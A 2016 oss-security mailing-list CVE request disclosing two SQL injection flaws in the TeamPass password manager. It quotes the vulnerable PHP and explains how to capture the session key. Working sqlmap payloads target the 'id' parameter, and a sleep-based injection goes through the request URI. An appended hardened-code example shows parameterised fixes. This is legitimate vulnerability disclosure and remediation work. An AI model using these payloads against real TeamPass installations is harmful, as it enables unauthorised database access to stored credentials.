Message-ID: <CAAjTPb_5q38hwdLzjNP+ejfhLvpNP7ny_tzCGF9diJf1zh1Pxw@mail.gmail.com>
Date: Mon, 11 Jul 2016 11:14:02 +0800
From: das das <scusec2010@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: SQL injections in TeamPass

Hello,

I'd like to request CVE IDs for these issues. They were found in TeamPass (www.teampass.net). All the issues are found in TeamPass (2.1.26, 2.1.25, 2.1.24).

Fixed: https://github.com/nilsteampassnet/TeamPass/commit/7bf6c63c4727a6ba9d65610e59ccbc25527a6fca

Issues detail:

#1: SQL injection vectors in sources/items.queries.php

-------------------------code_start TeamPass-2.1.26-------------------------
case "send_email":
    if ($_POST['key'] != $_SESSION['key']) {
        echo '[{"error" : "something_wrong"}]';
        break;
    } else {
        if (!empty($_POST['content'])) {
            $content = explode(',', $_POST['content']);
        }
        // get links url
        if (empty($_SESSION['settings']['email_server_url'])) {
            $_SESSION['settings']['email_server_url'] = $_SESSION['settings']['cpassman_url'];
        }
        if ($_POST['cat'] == "request_access_to_author") {
            $dataAuthor = DB::queryfirstrow("SELECT email,login FROM ".prefix_table("users")." WHERE id= ".$content[1]);
            $dataItem = DB::queryfirstrow("SELECT label FROM ".prefix_table("items")." WHERE id= ".$content[0]);
            $ret = @sendEmail(
                $LANG['email_request_access_subject'],
                str_replace(
                    array('#tp_item_author#', '#tp_user#', '#tp_item#'),
                    array(" ".addslashes($dataAuthor['login']), addslashes($_SESSION['login']), addslashes($dataItem['label'])),
                    $LANG['email_request_access_mail']
                ),
                $dataAuthor['email']
            );
        } elseif ($_POST['cat'] == "share_this_item") {
            $dataItem = DB::queryfirstrow("SELECT label,id_tree FROM ".prefix_table("items")." WHERE id= ".$_POST['id']);
            // send email
            $ret = @sendEmail(
                $LANG['email_share_item_subject'],
                str_replace(
                    array('#tp_link#', '#tp_user#', '#tp_item#'),
                    array($_SESSION['settings']['email_server_url'].'/index.php?page=items&group='.$dataItem['id_tree'].'&id='.$_POST['id'], addslashes($_SESSION['login']), addslashes($dataItem['label'])),
                    $LANG['email_share_item_mail']
                ),
                $_POST['receipt']
            );
        }
        echo '[{'.$ret.'}]';
    }
    break;
-------------------------code_end TeamPass-2.1.26--------------------------

In the "send_email" request, when the condition "$_POST['cat'] == "share_this_item"" is successful, the POST parameter "id" is unescaped, which leads to SQL injection. While it checks the session at the beginning of the script and needs the authority of a normal user to access the page. To execute the SQL query, it verifies that the POST parameter 'key' equals session['key']. We can get the key this way: refresh the page (e.g. index.php?page=items), capture the packet using tools (e.g. Burp Suite), and forward the packet; then we can get the value of session 'key' in the request body.

e.g. http://localhost:8088/code_audit/TeamPass/sources/items.queries.php
POST: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1*

Sqlmap payload:

sqlmap identified the following injection point(s) with a total of 406 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1 RLIKE (SELECT (CASE WHEN (7565=7565) THEN 1 ELSE 0x28 END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1 AND EXTRACTVALUE(4196,CONCAT(0x5c,0x7162766271,(SELECT (ELT(4196=4196,1))),0x716b706271))

    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: type=send_email&key=wiesu2Gae8shaeNgeengeiha2aic2ohghainia1laeyi9doh6G&cat=share_this_item&id=1 AND 7783=BENCHMARK(5000000,MD5(0x44794d4a))
---

#2: SQL injection vectors in includes/libraries/Database/Meekrodb/db.class.php

-------------------------code_start TeamPass-2.1.26-------------------------
// ----- BEGIN ERROR HANDLING
if (!$sql || $db->error) {
    if ($this->error_handler) {
        $db_error = $db->error;
        $db_errno = $db->errno;
        $db->query(
            "INSERT INTO ".$GLOBALS['pre']."log_system SET date=".time().", qui=".$_SESSION['user_id'].", label='Query: ".addslashes($sql)."<br />Error: ".addslashes($db_error)."<br />@ ".$_SERVER['REQUEST_URI']."', type='error'",
            MYSQLI_USE_RESULT
        );
-------------------------code_end TeamPass-2.1.26--------------------------

When a database error occurs, the code above will be executed. However, the variable "$_SERVER['REQUEST_URI']" is unescaped and controlled by us, which leads to a SQL injection.

First we need to find a place where a database error occurs, such as "sources/import.queries.php". It needs normal user authority to access the page. Then use Burp Suite to access the page to avoid the URL encoding by browsers.

e.g. http://localhost:8088/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1
POST: type=import_items&data=&folder=1

And the SQL log is as below. It is a time-based SQL injection.

-------------------------log_start-------------------------
Query INSERT INTO teampass_log_system SET date=1466674179, qui=10000001, label='Query: INSERT INTO `teampass_items` (`label`,`description`,`pw`,`pw_iv`,`url`,`id_tree`,`login`,`anyone_can_modify`) VALUES (\'\', NULL, \'\', \'dfd7c5279cdd697c08b627aeaaf15999\', NULL, \'1\', NULL, 0)<br />Error: Column \'description\' cannot be null<br />@ /code_audit/TeamPass/sources/import.queries.php?'or/**/sleep(5)/**/or'1', type='error'
-------------------------log_end---------------------------

These issues were discovered by wps2015[D.A.S] of Information Security Institute @ Sichuan University.
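Hardened counterparts of the two query sites named in the report, as an added example that is not TeamPass's own code nor the linked fix. It assumes MeekroDB's DB::queryFirstRow() with %i placeholders and a mysqli handle $db, as both appear in the quoted code; prefix_table(), $GLOBALS['pre'] and the log_system columns are taken from the quoted snippets.

```php
<?php
// Added example, not TeamPass's own code: parameterised versions of the two
// string-concatenated queries from issues #1 and #2 above.

// #1 sources/items.queries.php, "share_this_item" branch.
// Vulnerable form from the report (id is concatenated into the WHERE clause):
//   DB::queryfirstrow("SELECT label,id_tree FROM ".prefix_table("items")." WHERE id= ".$_POST['id']);
// Hardened: validate the id as a plain decimal integer, then bind it with %i so
// that anything appended to it (RLIKE ..., AND EXTRACTVALUE ...) is never parsed as SQL.
function fetchShareItem(array $post)
{
    if (!isset($post['id']) || !ctype_digit((string) $post['id'])) {
        return null; // reject non-integer ids before they reach the database
    }
    $itemId = (int) $post['id'];
    // MeekroDB escapes %i as an integer (assumed API, see lead-in).
    return DB::queryFirstRow(
        "SELECT label, id_tree FROM " . prefix_table("items") . " WHERE id = %i",
        $itemId
    );
}

// #2 includes/libraries/Database/Meekrodb/db.class.php error handler.
// Vulnerable form from the report: $_SERVER['REQUEST_URI'] is interpolated into
// the log INSERT without escaping, so the error logger is itself injectable.
// Hardened: a mysqli prepared statement binds every attacker-influenced value
// (failed query text, error message, request URI); addslashes() is no longer needed.
function logQueryError(mysqli $db, $sql, $dbError, $userId, $requestUri)
{
    $label = "Query: " . $sql . "<br />Error: " . $dbError . "<br />@ " . $requestUri;
    $stmt = $db->prepare(
        "INSERT INTO " . $GLOBALS['pre'] . "log_system SET date = ?, qui = ?, label = ?, type = 'error'"
    );
    if ($stmt === false) {
        return false; // preparing the log statement failed; do not fall back to concatenation
    }
    $date = time();
    $uid  = (int) $userId;
    $stmt->bind_param('iis', $date, $uid, $label); // bind_param needs variables, not expressions
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

Both functions keep the session and key checks of the surrounding code unchanged; they only replace how the request-derived values reach SQL.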